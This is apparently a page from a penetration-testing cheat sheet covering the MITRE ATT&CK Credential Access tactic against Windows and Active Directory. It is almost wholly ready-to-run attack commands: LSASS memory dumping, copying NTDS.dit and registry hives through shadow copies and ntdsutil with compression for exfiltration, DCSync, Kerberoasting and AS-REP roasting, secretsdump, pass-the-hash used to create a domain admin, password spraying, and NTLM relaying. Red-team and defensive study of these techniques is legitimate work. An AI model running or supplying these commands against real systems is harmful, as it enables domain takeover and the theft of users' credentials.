Credential Access

The adversary is trying to steal account names and passwords. https://attack.mitre.org/tactics/TA0006/

SecureString to Plaintext

$SecPass = "<SECURE PASS STRING>" | ConvertTo-SecureString; 
(New-Object System.Management.Automation.PSCredential "N/A", $SecPass).GetNetworkCredential().Password;

Passwords in Description

ActiveDirectory Module

Get-ADUser -Filter 'Description -like "*password*"' -Properties Description | select name,Description

Using PowerView.ps1 GitHub: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Find-UserField -SearchField Description -SearchTerm "password"

Volume Shadow Creation

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

# creating volume shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

# copying NTDS.dit, SYSTEM and SECURITY files from shadow copy
wmic /node:"[AD_IP_address]" /user:"[username]" /password:"[password]" process call create "cmd /c copy \\[shadow_copy_dir]\\Windows\\NTDS\\NTDS.dit [target_folder] & copy \\[shadow_copy_dir]\\Windows\\System32\\config\\SYSTEM [target_folder] & copy \\[shadow_copy_dir]\\Windows\\System32\\config\\SECURITY [target_folder]"

# compressing files for exfiltration
7za.exe a -mx3 nt.7z \\\\[AD_IP_address]\\c$\\[target_folder]

Stored Credential Enumeration

You can use cmdkey command or the keymgr.dll (requires GUI) to list out stored credentials. Additionally, you can use the output in a runas command to authenticate.

Listing saved credentials:

cmdkey /list

Listing saved credentials in a desktop environment:

rundll32.exe keymgr.dll, KRShowKeyMgr

Using saved credentials:

runas /savecred /user:jmith cmd.exe

Dumping LSASS with rundll32.exe

Same behavior that would occur if you Right-Clicked the process in Task Manager and dump LSASS manually.

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

Memory Dump with Get-StorageDiagnosticInfo

Source: https://x.com/0gtweet/status/1440255495797764108 https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2019-ps

$fname = Get-StorageSubSystem | Select -Property FriendlyName
Get-StorageDiagnosticInfo -StorageSubSystemFriendlyName $fname -IncludeLiveDump -DestinationPath C:\

Mount VHD, pull SAM

guestmount --add GoldenWindows11x64.vhdx --inspector --ro -v /mnt
cd /mnt/Windows/System32/config
cp SAM SYSTEM /root && cd /root && guestunmount /mnt
secretsdump.py -sam /root/SAM -system /root/SYSTEM local

Targeted Kerberoasting with PowerSploit

Get-DomainUser 'victimuser' | Select serviceprincipalname
Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}

# Obtain a kerberoast hash to crack
$User = Get-DomainUser 'victimuser'
$User | Get-DomainSPNTicket | fl

# Clear the SPNs of the target account
$User | Select serviceprincipalname
Set-DomainObject -Identity victimuser -Clear serviceprincipalname

Dumping NTDS with ntdsutil.exe

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

DSInternals

DSInternals found here: https://github.com/MichaelGrafnetter/DSInternals

DCSync with Get-ADReplAccount

Credit to @Mastadon. 

Get-ADReplAccount -Server <DC FQDN> -All | Where { $_.Enabled -eq $True} | Format-Custom -View PwDump | tee hashes.ntds ; if($?) {cat .\hashes.ntds | select-string -NotMatch '\$', '\$DUPLICATE', 'IWAM_', 'IUSR_', 'ASPNET', 'HelpAssistant', 'SUPPORT_', 'Guest', 'DefaultAccount', 'HealthMailbox' |%{$_.Line.Trim()} | ? {$_.Trim() -ne "" }| Sort | Get-Unique | Out-File -encoding ASCII hashes_sorted.txt}

Extracting from NTDS, SYSTEM, SECURITY

You may have to modify the following registry key:

  • HKLM\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy and set "Enabled" to 0

Install-Module DSInternals; 
Import-Module DSInternals;

$key = Get-BootKey -SystemHivePath '.\registry\SYSTEM';
Get-ADDBAccount -DistinguishedName 'CN=krbtgt,CN=Users,DC=burmat,DC=local' -DBPath '.\Active Directory\ntds.dit' -BootKey $key;

Extracting NTDS with ntdsutil.exe

C:\> ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit

Impacket

GetUserSPNs.py

Kerberoasting

GetUserSPNs.py -request -dc-ip 10.10.10.123 burmat.local/xsvc:S3cur3PW123

GetNPUsers.py

AS-REP Roasting - Attempt to get TGTs for users that have UF_DONT_REQUIRE_PREAUTH set:

GetNPUsers.py -request -no-pass -dc-ip 10.10.10.123 burmat.local/ -usersfile users.txt

secretsdump.py

Using secretsdump to steal credentials.

Extracting Credentials Remotely

secretsdump.py -just-dc-ntlm burmat.local/administrator@10.10.10.123

Offline NTDS Cracking

secretsdump.py -ntds ./ntds.dit -system SYSTEM LOCAL -output dump.ntds -user-status

Resetting Credentials with smbpasswd.py

Reset a password if you have the credentials but it is expired. Useful if you have a hash and no pw, too.

smbpasswd -r 10.0.0.12 -U 'burmat'

NetExec

GitHub repo: https://github.com/Pennyw0rth/NetExec

Pass-the-Hash

Because hashes are just as good:

# create a user
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net user burmat Pwn3dPwn3d! /add /domain'

# add to domain admins
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -H 'd7452863d1e8e15241nn50ceb1ab9dfe' -x 'net group "Domain Admins" /add burmat /domain'

SMB Password Spraying

Switch out usernames/passwords/targets with lists:

## to spray that Spring2024! and a list of users against a list of targets:
nxc smb 'targets.txt' -u 'users.txt' -p 'Spring2024!' -d 'burmat.local'

Dumping Remote PowerShell History

nxc smb 10.250.1.33 -u 'dev001' -p 'burmat123$' -d 'burmat.local' -M powershell_history

Extracting Credentials

## mimikatz module
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -p 'S3cur3PW123' -M mimikatz -o COMMAND='privilege::debug'

## SAM database
nxc smb 10.10.10.123 -u 'administrator' -d 'burmat.local' -p 'S3cur3PW123' --sam

Relaying to DCSync

ntlmrelayx.py -t DCSYNC://172.16.1.200 -smb2support -debug
python3 dementor.py -d burmat.local -u jsmith -p 'S3cur3PASS123$' 10.10.1.141 172.16.1.23 -debug

PreviousCommand and ControlNextDefense Evasion

Last updated